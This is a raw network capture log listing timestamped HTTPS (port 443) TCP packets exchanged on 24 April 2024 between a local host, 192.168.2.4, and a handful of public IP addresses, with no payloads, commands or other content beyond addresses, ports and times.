Apr 24, 2024 15:24:08.378493071 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.378906012 CEST	49735	443	192.168.2.4	34.233.171.195
Apr 24, 2024 15:24:08.378931046 CEST	443	49735	34.233.171.195	192.168.2.4
Apr 24, 2024 15:24:08.494240046 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.494275093 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.494363070 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.494872093 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.494880915 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.539968014 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.540009022 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.540090084 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.540291071 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.540303946 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.861112118 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.861474037 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.861485958 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.862340927 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.862440109 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.863424063 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.863468885 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.873913050 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.874183893 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.874205112 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.875695944 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.875771999 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.876904011 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.876985073 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.877123117 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.877130032 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:08.910404921 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:08.910418987 CEST	443	49738	142.250.141.99	192.168.2.4
Apr 24, 2024 15:24:08.925661087 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:08.956686974 CEST	49738	443	192.168.2.4	142.250.141.99
Apr 24, 2024 15:24:09.233107090 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233175993 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233227015 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:09.233237982 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233253002 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233294010 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:09.233305931 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233321905 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.233365059 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:09.298768997 CEST	49739	443	192.168.2.4	104.21.52.206
Apr 24, 2024 15:24:09.298795938 CEST	443	49739	104.21.52.206	192.168.2.4
Apr 24, 2024 15:24:09.458636999 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.458688021 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.458755970 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.458991051 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.459002018 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.777004004 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.778382063 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.778409004 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.779910088 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.779974937 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.782510996 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.782607079 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.783839941 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:09.783850908 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:09.827167988 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.128782034 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.128855944 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.129374981 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.129406929 CEST	443	49741	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.129421949 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.129421949 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.129460096 CEST	49741	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.135199070 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.135227919 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.135415077 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.136651993 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.136666059 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.446461916 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.447232008 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.447244883 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.447719097 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.448451042 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.448525906 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.448880911 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.492137909 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810694933 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810759068 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810801029 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810815096 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.810827017 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810873985 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810915947 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810918093 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.810930014 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.810972929 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.811322927 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.811368942 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.811373949 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.811429977 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.811568975 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.811573982 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.812218904 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.812258959 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.812262058 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.812273979 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.812311888 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.812316895 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813024044 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813062906 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813076973 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.813081980 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813200951 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.813864946 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813946009 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813982964 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.813993931 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.813998938 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.814054012 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.814661026 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.814738035 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.814774036 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.814817905 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.814825058 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.815013885 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.815538883 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.815615892 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.815697908 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.815705061 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816500902 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816540003 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816549063 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.816554070 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816592932 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.816596985 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816648960 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:10.816692114 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.857045889 CEST	49742	443	192.168.2.4	104.17.2.184
Apr 24, 2024 15:24:10.857062101 CEST	443	49742	104.17.2.184	192.168.2.4
Apr 24, 2024 15:24:11.169387102 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.169426918 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.169498920 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.171879053 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.171890974 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.519052982 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.519157887 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.532280922 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.532299042 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.532691956 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.573399067 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.581084967 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.581191063 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.581270933 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.581515074 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.581552029 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.703881025 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.748125076 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.872615099 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.872705936 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.872781038 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.891196966 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.897785902 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.897834063 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.898957968 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.899033070 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.899863005 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.899943113 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.900214911 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:11.900233030 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:11.917294025 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.917315006 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.917330027 CEST	49743	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:11.917335987 CEST	443	49743	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:11.949157000 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.046623945 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.046684980 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.046770096 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.047594070 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.047627926 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.252984047 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253204107 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253268957 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.253287077 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253317118 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253447056 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.253468037 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253550053 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253631115 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253679991 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.253690004 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.253730059 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.253736973 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254365921 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254419088 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.254439116 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254462957 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254587889 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254618883 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.254636049 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.254684925 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.254698038 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.255295992 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.255357027 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.255371094 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256036997 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256133080 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256134033 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.256155968 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256280899 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256335974 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.256351948 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256398916 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.256409883 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.256936073 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257108927 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.257122993 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257252932 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257318020 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.257328033 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257349968 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257405996 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.257426023 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.257987022 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258198977 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.258198977 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258223057 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258476973 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258505106 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.258519888 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258621931 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.258634090 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258836031 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.258888960 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.258902073 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259020090 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259090900 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.259104013 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259541035 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259608030 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.259619951 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259767056 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259824038 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.259852886 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.259969950 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.260066032 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.260078907 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.260546923 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.260618925 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.260632038 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.260782957 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.260838985 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.260852098 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261271000 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261459112 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261501074 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.261516094 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261569977 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.261583090 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261744022 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.261841059 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.261852980 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.262408972 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.262495041 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.262496948 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.262522936 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.262574911 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.262609959 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.307183981 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.341077089 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.341140985 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.341229916 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.341543913 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.341562033 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.393945932 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.394057989 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.396759033 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.396776915 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.397170067 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.401417017 CEST	49745	443	192.168.2.4	23.206.6.29
Apr 24, 2024 15:24:12.406408072 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.406627893 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.406707048 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.406704903 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.406788111 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.406856060 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.406872988 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.406977892 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.407032967 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.407047033 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.408135891 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.408215046 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.408229113 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.408642054 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.408699036 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.408711910 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.408921003 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409034014 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.409046888 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409195900 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409240961 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.409255028 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409342051 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409485102 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409538031 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.409573078 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.409625053 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.409653902 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.410037994 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.410092115 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.410104990 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.410300970 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.410419941 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.410432100 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.410900116 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.411065102 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.411262989 CEST	49744	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.411297083 CEST	443	49744	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.429433107 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.429490089 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.429718018 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.430212975 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.430243015 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.448127031 CEST	443	49745	23.206.6.29	192.168.2.4
Apr 24, 2024 15:24:12.658554077 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.658938885 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.658953905 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.660185099 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.660557985 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.660732031 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.660737038 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.704148054 CEST	443	49746	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.713833094 CEST	49746	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.745768070 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.746049881 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.746063948 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.747165918 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.747646093 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.747814894 CEST	443	49747	104.17.3.184	192.168.2.4
Apr 24, 2024 15:24:12.747896910 CEST	49747	443	192.168.2.4	104.17.3.184
Apr 24, 2024 15:24:12.775974989 CEST	443	49745	23.206.6.29	192.168.2.4
